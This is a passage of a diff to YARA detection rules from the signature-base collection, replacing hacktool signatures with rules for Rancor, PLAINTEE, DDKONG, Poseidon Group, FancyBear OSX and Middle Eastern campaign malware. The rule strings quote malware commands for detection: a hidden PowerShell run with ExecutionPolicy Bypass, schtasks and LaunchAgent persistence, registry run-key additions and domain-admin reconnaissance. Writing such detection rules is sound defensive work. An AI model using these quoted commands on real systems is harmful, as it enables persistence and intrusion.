 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $s1 and not $n1 and not 1 of ( $nfp* ) )
 }
-rule SIGNATURE_BASE_Hydra_7_3_Hydra : FILE
+rule SIGNATURE_BASE_APT_RANCOR_JS_Malware : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hydra.exe"
+		description = "Rancor Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "70e9a5bf-ce2d-58ab-8bdc-257e2aa5e917"
-		date = "2015-06-13"
+		id = "83dd9567-199e-511c-8c9a-96422bd793e7"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2130-L2147"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L13-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"
-		logic_hash = "23194c2df0b8bdedc4fc66c423b0aebb10217de328a194b26560d4cc9a5531e3"
+		logic_hash = "0d1e86d4395d4f84518750b5d58d15ed79b79570fbe50010d5d790b4c2511bb2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458"
 
 	strings:
-		$s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii
-		$s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii
-		$s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii
-		$s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
-		$s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
+		$x1 = ",0,0 >%SystemRoot%\\system32\\spool\\drivers\\color\\fb.vbs\",0,0" fullword ascii
+		$x2 = "CreateObject(\"Wscript.Shell\").Run \"explorer.exe \"\"http" ascii
+		$x3 = "CreateObject(\"Wscript.Shell\").Run \"schtasks /create" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+		uint16( 0 ) == 0x533c and filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Oraclescan : FILE
+rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Variant : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file OracleScan.exe"
+		description = "Detects PLAINTEE malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "142c0ed1-0752-54c3-9a4b-68e656c32939"
-		date = "2015-06-13"
+		id = "f5b68079-0517-504d-a45f-f6ced532db82"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2149-L2165"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L30-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "10ff7faf72fe6da8f05526367b3522a2408999ec"
-		logic_hash = "b9454f47123c32d6c6b51722aeadac9acc2a6232c259703c36ea00c83d8977e6"
+		logic_hash = "d22aa91d0f66dbb85b79c0f121f0508135bf817929d81f3ff0b3fdf223ba53ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31"
+		hash2 = "bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e"
 
 	strings:
-		$s1 = "MYBLOG:HTTP://HI.BAIDU.COM/0X24Q" fullword ascii
-		$s2 = "\\Borland\\Delphi\\RTL" ascii
-		$s3 = "USER_NAME" ascii
-		$s4 = "FROMWWHERE" fullword ascii
+		$s1 = "payload.dat" fullword ascii
+		$s3 = "temp_microsoft_test.txt" fullword ascii
+		$s4 = "reg add %s /v %s /t REG_SZ /d \"%s\"" fullword ascii
+		$s6 = "%s %s,helloworld2" fullword ascii
+		$s9 = "%s \\\"%s\\\",helloworld" fullword ascii
+		$s16 = "recv plugin type %s size:%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_Sqltools : FILE
+
+rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Malware_Exports : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file SQLTools.exe"
+		description = "Detects PLAINTEE malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bddb7956-abc1-58b6-8a6d-eb482be99f42"
-		date = "2015-06-13"
+		id = "fa1e678d-8357-522b-9167-31321ab7753f"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2167-L2186"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L51-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "38a9caa2079afa2c8d7327e7762f7ed9a69056f7"
-		logic_hash = "35b84c3445e92d61ca5e638a2eb19128dca2174327c6325436287d8d3f0bb976"
+		logic_hash = "aa55452d4639dbaec760277908906c4ff9e8b66a60b1bcdc157ce23bd5d596db"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "DBN_POST" fullword wide
-		$s2 = "LOADER ERROR" fullword ascii
-		$s3 = "www.1285.net" fullword wide
-		$s4 = "TUPFILEFORM" fullword wide
-		$s5 = "DBN_DELETE" fullword wide
-		$s6 = "DBINSERT" fullword wide
-		$s7 = "Copyright (C) Kibosoft Corp. 2001-2006" fullword wide
+		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2350KB and all of them
+		uint16( 0 ) == 0x5a4d and pe.exports ( "Add" ) and pe.exports ( "Sub" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
 }
-rule SIGNATURE_BASE_HKTL_Portscanner_533_NET_Jun15 : FILE
+
+rule SIGNATURE_BASE_APT_RANCOR_DDKONG_Malware_Exports : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file portscanner.exe"
+		description = "Detects DDKONG malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c834203d-6d4d-5242-9b1e-b64fa6560ccd"
-		date = "2015-06-13"
+		id = "c94d4ea2-7c16-5003-98ea-253f8a2d01d1"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		old_rule_name = "portscanner"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2188-L2205"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rancor.yar#L64-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"
-		logic_hash = "446cbc1b8046bfd182e0b1c98fe37c8b8ef98f600f5d80d9de83b45aeaf2b386"
+		logic_hash = "2d11d46530c22b323c504344448d91fd43c0eecd29cf29aa4da7b2c797d27ff9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "PortListfNo" fullword ascii
-		$s1 = ".533.net" fullword ascii
-		$s2 = "CRTDLL.DLL" fullword ascii
-		$s3 = "exitfc" fullword ascii
+		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
+		uint16( 0 ) == 0x5a4d and pe.exports ( "ServiceMain" ) and pe.exports ( "Rundll32Call" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
 }
-rule SIGNATURE_BASE_Kappfree : FILE
+rule SIGNATURE_BASE_Poseidongroup_Malware : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file kappfree.dll"
+		description = "Detects Poseidon Group Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb9c1324-5d82-57ab-bd48-98c984b45b32"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2207-L2222"
+		id = "fe8b227a-d93d-5540-ba73-3f20358205f6"
+		date = "2016-02-09"
+		modified = "2023-01-27"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poseidon_group.yar#L8-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e57e79f190f8a24ca911e6c7e008743480c08553"
-		logic_hash = "b1b644f9b033ac8372369e81628ee3f6fe094f80d11b8f4f6c192a5e81d2e543"
-		score = 75
+		logic_hash = "315d540f2d2cb7b55e1a069cef8dd2eeceabcea4a428b33cf520a0f23d3819ea"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "337e94119cfad0b3144af81b72ac3b2688a219ffa0bdf23ca56c7a68fbe0aea4"
+		hash2 = "344034c0bf9fcd52883dbc158abf6db687150d40a118d9cd6ebd843e186128d3"
+		hash3 = "432b7f7f7bf94260a58ad720f61d91ba3289bf0a9789fc0c2b7ca900788dae61"
+		hash4 = "8955df76182005a69f19f5421c355f1868efe65d6b9e0145625dceda94b84a47"
+		hash5 = "d090b1d77e91848b1e2f5690b54360bbbd7ef808d017304389b90a0f8423367f"
+		hash6 = "d7c8b47a0d0a9181fb993f17e165d75a6be8cf11812d3baf7cf11d085e21d4fb"
+		hash7 = "ded0ee29af97496f27d810f6c16d78a3031d8c2193d5d2a87355f3e3ca58f9b3"
 
 	strings:
-		$s1 = "Bienvenue dans un processus distant" fullword wide
-		$s2 = "kappfree.dll" fullword ascii
-		$s3 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
+		$s1 = "c:\\winnt\\system32\\cmd.exe" fullword ascii
+		$s2 = "c:\\windows\\system32\\cmd.exe" fullword ascii
+		$s3 = "c:\\windows\\command.com" fullword ascii
+		$s4 = "copy \"%s\" \"%s\" /Y" fullword ascii
+		$s5 = "http://%s/files/" ascii
+		$s6 = "\"%s\". %s: \"%s\"." fullword ascii
+		$s7 = "0x0666" fullword ascii
+		$s8 = "----------------This_is_a_boundary$" fullword ascii
+		$s9 = "Server 2012" fullword ascii
+		$s10 = "Server 2008" fullword ascii
+		$s11 = "Server 2003" fullword ascii
+		$a1 = "net.exe group \"Domain Admins\" /domain" fullword ascii
+		$a2 = "net.exe group \"Admins. do Dom" fullword ascii
+		$a3 = "(SVRID=%d)" fullword ascii
+		$a4 = "(TG=%d)" fullword ascii
+		$a5 = "(SVR=%s)" fullword ascii
+		$a6 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
+		$a7 = "net.exe localgroup Administradores" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 650KB and 6 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $a* ) )
 }
-rule SIGNATURE_BASE_Smartniff : FILE
+rule SIGNATURE_BASE_Poseidongroup_Maldoc_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Smartniff.exe"
+		description = "Detects Poseidon Group - Malicious Word Document"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3d169126-1b43-5545-a106-7c38a6a49499"
-		date = "2015-06-13"
+		id = "ab26455a-d468-5a75-a6e2-61701ca3a1df"
+		date = "2016-02-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2224-L2239"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poseidon_group.yar#L50-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "67609f21d54a57955d8fe6d48bc471f328748d0a"
-		logic_hash = "bac770ae3c8e7f619da0b0ff4243716ff8212dce0f36c08c127af892548fe0b6"
-		score = 75
+		hash = "0983526d7f0640e5765ded6be6c9e64869172a02c20023f8a006396ff358999b"
+		logic_hash = "0d8c255f56bb33b6a720c98727127c07a2d77245b18da381706a40339bebd20b"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "smsniff.exe" fullword wide
-		$s2 = "support@nirsoft.net0" fullword ascii
-		$s3 = "</requestedPrivileges></security></trustInfo></assembly>" fullword ascii
+		$s1 = "c:\\cmd32dll.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Chinachopper_Caidao : FILE
+rule SIGNATURE_BASE_Poseidongroup_Maldoc_2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file caidao.exe"
+		description = "Detects Poseidon Group - Malicious Word Document"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c56eb3e5-e916-535b-bf87-88a9ae94c359"
-		date = "2015-06-13"
+		id = "9fc0f25e-809d-5803-be39-740ce3a3c85a"
+		date = "2016-02-09"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2241-L2259"
+		reference = "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poseidon_group.yar#L66-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "056a60ec1f6a8959bfc43254d97527b003ae5edb"
-		logic_hash = "7e16a452c98e36a4946bcede5552bef7f6fc82314b28b506307cf010a0890ea6"
-		score = 75
+		logic_hash = "2c35077a4980336a2c50cade322861dc02f92f7617115420eebe7c882c2f620b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3e4cacab0ff950da1c6a1c640fe6cf5555b99e36d4e1cf5c45f04a2048f7620c"
+		hash2 = "1f77475d7740eb0c5802746d63e93218f16a7a19f616e8fddcbff07983b851af"
+		hash3 = "f028ee20363d3a17d30175508bbc4738dd8e245a94bfb200219a40464dd09b3a"
+		hash4 = "ec309300c950936a1b9f900aa30630b33723c42240ca4db978f2ca5e0f97afed"
+		hash5 = "27449198542fed64c23f583617908c8648fa4b4633bacd224f97e7f5d8b18778"
+		hash6 = "1e62629dae05bf7ee3fe1346faa60e6791c61f92dd921daa5ce2bdce2e9d4216"
 
 	strings:
-		$s1 = "Pass,Config,n{)" fullword ascii
-		$s2 = "phMYSQLZ" fullword ascii
-		$s3 = "\\DHLP\\." ascii
-		$s4 = "\\dhlp\\." ascii
-		$s5 = "SHAutoComple" fullword ascii
-		$s6 = "MainFrame" ascii
+		$s0 = "{\\*\\generator Msftedit 5.41." ascii
+		$s1 = "Attachment 1: Complete Professional Background" ascii
+		$s2 = "E-mail:  \\cf1\\ul\\f1"
+		$s3 = "Education:\\par" ascii
+		$s5 = "@gmail.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1077KB and all of them
+		uint32( 0 ) == 0x74725c7b and filesize < 500KB and 3 of them
 }
-rule SIGNATURE_BASE_Kiwitaskmgr_2 : FILE
+rule SIGNATURE_BASE_MAL_OSX_Fancybear_Agent_Jul18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file KiwiTaskmgr.exe"
+		description = "Detects FancyBear Agent for OSX"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea021257-8ced-5131-a00a-be014b4112fb"
-		date = "2015-06-13"
+		id = "ae717f70-7196-561a-916f-1598ab38c77a"
+		date = "2018-07-15"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2261-L2276"
+		reference = "https://twitter.com/DrunkBinary/status/1018448895054098432"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fancybear_osxagent.yar#L1-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
-		logic_hash = "6d197e9b7bb9bbd759d6c8c882f7d7412512ba10208cb52a08fcde5e32fd1733"
+		logic_hash = "099235424f22f3591a891726ea0c13ebf831fae0456ab1b6baba329c090a9535"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d3be93f6ce59b522ff951cef9d59ef347081ffe33d4203cd5b5df0aaa9721aa2"
 
 	strings:
-		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
-		$s2 = "Kiwi Taskmgr no-gpo" fullword wide
-		$s3 = "KiwiAndTaskMgr" fullword wide
+		$x1 = "/Users/kazak/Desktop/" ascii
+		$s1 = "launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist" fullword ascii
+		$s2 = "mkdir -p /Users/Shared/.local/ &> /dev/null" fullword ascii
+		$s3 = "chmod 755 /Users/Shared/start.sh" fullword ascii
+		$s4 = "chmod 755 %s/%s &> /dev/null" fullword ascii
+		$s6 = "chmod 755 /Users/Shared/.local/kextd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0xfacf and filesize < 3000KB and ( 1 of ( $x* ) and 4 of them )
 }
-rule SIGNATURE_BASE_Kappfree_2 : FILE
+
+rule SIGNATURE_BASE_ME_Campaign_Malware_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file kappfree.dll"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c7b4a99-b5ab-5fd6-b130-7c30b84b7171"
-		date = "2015-06-13"
+		id = "7c844c5c-caf0-5968-ac1a-72886fcf97cf"
+		date = "2018-02-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2278-L2294"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L13-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
-		logic_hash = "1862f1283e8a268f523b3922b3630ebbca9a81cc5aed19e5068315e6346d25c2"
+		logic_hash = "e5ea689de4be64a02aed31c85a4bd56561ba932587998bc276ddba248d73fa2d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "kappfree.dll" fullword ascii
-		$s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
-		$s3 = "' introuvable !" fullword wide
-		$s4 = "kiwi\\mimikatz" fullword wide
+		hash1 = "1176642841762b3bc1f401a5987dc55ae4b007367e98740188468642ffbd474e"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( pe.imphash ( ) == "618f76eaf4bd95c690d43e84d617efe9" )
 }
-rule SIGNATURE_BASE_X_Way2_5_Sqlcmd : FILE
+
+rule SIGNATURE_BASE_ME_Campaign_Malware_2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file sqlcmd.exe"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6b4dae2-38cb-5cf9-b980-df5ebefbe7ad"
-		date = "2015-06-13"
+		id = "a0beec30-62ff-54c3-ab62-c54454b89f8d"
+		date = "2018-02-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2296-L2324"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L28-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
-		logic_hash = "59fd25a786d56885e456fca154800a8313cd04a23fd9374361cc37b86be109a1"
+		logic_hash = "414e7760c56d2a1713258bb5c5f65e4fb561523ae037f8715d7fba5914ef9211"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "76a9b603f1f901020f65358f1cbf94c1a427d9019f004a99aa8bff1dea01a881"
 
 	strings:
-		$s1 = "LOADER ERROR" fullword ascii
-		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
-		$s4 = "kernel32.dll" fullword ascii
-		$s5 = "VirtualAlloc" fullword ascii
-		$s6 = "VirtualFree" fullword ascii
-		$s7 = "VirtualProtect" fullword ascii
-		$s8 = "ExitProcess" fullword ascii
-		$s9 = "user32.dll" fullword ascii
-		$s16 = "MessageBoxA" fullword ascii
-		$s10 = "wsprintfA" fullword ascii
-		$s11 = "kernel32.dll" fullword ascii
-		$s12 = "GetProcAddress" fullword ascii
-		$s13 = "GetModuleHandleA" fullword ascii
-		$s14 = "LoadLibraryA" fullword ascii
-		$s15 = "odbc32.dll" fullword ascii
+		$s1 = "QuickAssist.exe" fullword wide
+		$s2 = "<description>Microsoft Modern Sharing Solution</description>" fullword ascii
+		$s3 = "GBEWCWA" fullword ascii
+		$s4 = "name=\"QuickAssist\" " fullword ascii
+		$s5 = "Cimzal" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b06055e6cc2a804111ab6964df1ca4ae" or 4 of them )
 }
-rule SIGNATURE_BASE_Win32_Klock : FILE
+rule SIGNATURE_BASE_ME_Campaign_Malware_3 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file klock.dll"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd17a8e2-54af-5967-937a-d83feceab891"
-		date = "2015-06-13"
+		id = "d8bfd426-ff42-5332-8206-67a558509494"
+		date = "2018-02-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2326-L2341"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L50-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7addce4434670927c4efaa560524680ba2871d17"
-		logic_hash = "e9f1d38de15ce06d55cf276e0f2becd9f9dbf5bd22f9061de03761d7ccdd3e60"
+		logic_hash = "7d45f9f624285ed13a16901335585490459f22ef8af157c38b720118735ed432"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
 
 	strings:
-		$s1 = "klock.dll" fullword ascii
-		$s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide
-		$s3 = "klock de mimikatz pour Windows" fullword wide
+		$x1 = "objWShell.Run \"powershell.exe -ExecutionPolicy Bypass -File \"\"%appdata%\"\"\\sys.ps1\", 0 " fullword ascii
+		$x2 = "objFile.WriteLine \"New-Item -Path \"\"$ENV:APPDATA\\Microsoft\\Templates\"\" -ItemType Directory -Force }\" " fullword ascii
+		$x3 = "objFile.WriteLine \"$path = \"\"$ENV:APPDATA\\Microsoft\\Templates\\Report.doc\"\"\" " fullword ascii
+		$s4 = "File=appData & \"\\sys.ps1\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		uint16( 0 ) == 0x6553 and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_Ipsearcher : FILE
+
+rule SIGNATURE_BASE_ME_Campaign_Malware_4 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file ipsearcher.dll"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb33535a-e8cc-545d-bee8-3c31902eedb9"
-		date = "2015-06-13"
-		modified = "2022-12-21"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L2343-L2360"
+		id = "1ff83ac6-e3f1-55e2-a811-e526b8235c78"
+		date = "2018-02-07"
+		modified = "2023-12-05"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_middle_east_talosreport.yar#L68-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
-		logic_hash = "e63349ede826bc7b0e9c94d122e5b294c11a598fcf7096b80be726146e796a80"
+		logic_hash = "83340b2d8f5f58f886eb318b80d7fbb0b9a4f5ad634db857edc405932f3ea5bc"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "http://www.wzpg.com" fullword ascii
-		$s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" ascii
-		$s3 = "_GetAddress" fullword ascii
-		$s5 = "ipsearcher.dll" fullword ascii
